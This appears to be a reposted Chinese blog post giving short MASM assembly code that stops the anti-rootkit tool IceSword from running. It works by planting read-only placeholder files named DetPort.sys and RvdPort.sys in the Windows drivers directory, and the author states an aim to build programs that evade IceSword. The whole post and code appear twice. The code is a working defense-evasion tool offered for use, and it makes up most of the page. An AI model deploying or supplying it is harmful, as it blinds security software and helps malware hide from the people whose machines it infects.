让IceSword运行不了(ASM代码)
来源:百度文库 编辑:神马文学网 时间:2024/10/04 16:08:20
让IceSword运行不了(ASM代码)
这个东西没有什么技术含量的,用来缓急用的,运行后,以后就无法运行IceSword了,如果要使用IceSword,你必须删除\drivers\目录下的DetPort.sys或RvdPort.sys,最近在学习Ring0,争取写个能躲过Icesword的程序。
CODE:;by Immlep
;http://immlep.blogone.net
;飞走的昨天,就像爱和伤已没有界限
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
.data
hfile dd 0
drive1 db ‘\drivers\DetPort.sys‘,0
drive2 db ‘\drivers\RvdPort.sys‘,0
format db "%s%s",0
buf db 50 dup(0)
drive db 80 dup(0)
.code
start:
invoke GetSystemDirectory,addr buf,sizeof buf
invoke wsprintf,addr drive,addr format,addr buf,addr drive1
invoke CreateFile,addr drive,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_NEW,FILE_ATTRIBUTE_READONLY,hfile
invoke wsprintf,addr drive,addr format,addr buf,addr drive2
invoke CreateFile,addr drive,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_NEW,FILE_ATTRIBUTE_READONLY,hfile
invoke ExitProcess,NULL
end start
这个东西没有什么技术含量的,用来缓急用的,运行后,以后就无法运行IceSword了,如果要使用IceSword,你必须删除\drivers\目录下的DetPort.sys或RvdPort.sys,最近在学习Ring0,争取写个能躲过Icesword的程序。
CODE:;by Immlep
;http://immlep.blogone.net
;飞走的昨天,就像爱和伤已没有界限
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
.data
hfile dd 0
drive1 db ‘\drivers\DetPort.sys‘,0
drive2 db ‘\drivers\RvdPort.sys‘,0
format db "%s%s",0
buf db 50 dup(0)
drive db 80 dup(0)
.code
start:
invoke GetSystemDirectory,addr buf,sizeof buf
invoke wsprintf,addr drive,addr format,addr buf,addr drive1
invoke CreateFile,addr drive,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_NEW,FILE_ATTRIBUTE_READONLY,hfile
invoke wsprintf,addr drive,addr format,addr buf,addr drive2
invoke CreateFile,addr drive,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_NEW,FILE_ATTRIBUTE_READONLY,hfile
invoke ExitProcess,NULL
end start